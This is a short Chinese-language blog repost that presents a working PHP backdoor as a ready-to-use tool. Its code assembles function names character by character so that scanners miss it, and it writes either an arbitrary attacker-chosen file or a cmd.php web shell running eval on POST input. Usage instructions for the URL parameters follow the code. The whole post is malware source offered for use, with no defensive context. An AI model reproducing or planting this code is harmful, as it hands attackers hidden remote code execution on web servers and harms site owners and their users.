PHP后门一枚

转自:Return Blogs: www.creturn.com
代码:
<?php /* * PHP后门程序 * 使用说明:此程序默认会在当前目录下生成一句话cmd.php密码cmd * 不含有任何敏感函数有它也查不出来所以免杀是必然的。生成的一句 * 不是免杀的,要免杀原理已经能看到了,自行处理。 * 亲,使用的时候注意删除这里的注释~~ * BY: Return Data:2012.6.29 */ function scm(){ $pod = '123'; //密码 $_GET['ct'] == $pod ? '' : exit(); $fcn = 'f'.'i'.'l'.'e'.'_'.'p'.'u'.'t'.'_'.'c'.'o'.'n'.'t'.'e'.'n'.'t'.'s'; if(@$_GET['sf']=='yes'){ $fnm = $_GET['filepath']; $fct = $_GET['content']; }else{ $fnm = 'c'.'m'.'d'.'.'.'p'.'h'.'p'; $fct = '<'.'?'.'p'.'h'.'p'.' @'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'"'.'c'.'m'.'d'.'"'.']'.')'.'?'.'>'; } @$fcn($fnm, $fct); echo 'succeed!'; } scm();
说下使用方法:
参数:ct 为密码 ,sf 为是否使用自定义内容,
filepath 自定义文件路径,content 自定义文件内容
自带后门生成方法 : door.php?ct=密码
自定义后门生成方法: door.php?ct=密码&sf=yes&filepath=文件路径&content=文件内容
注意:
自动生成后门会在当前目录下生成一个cmd.php密码为cmd的一句话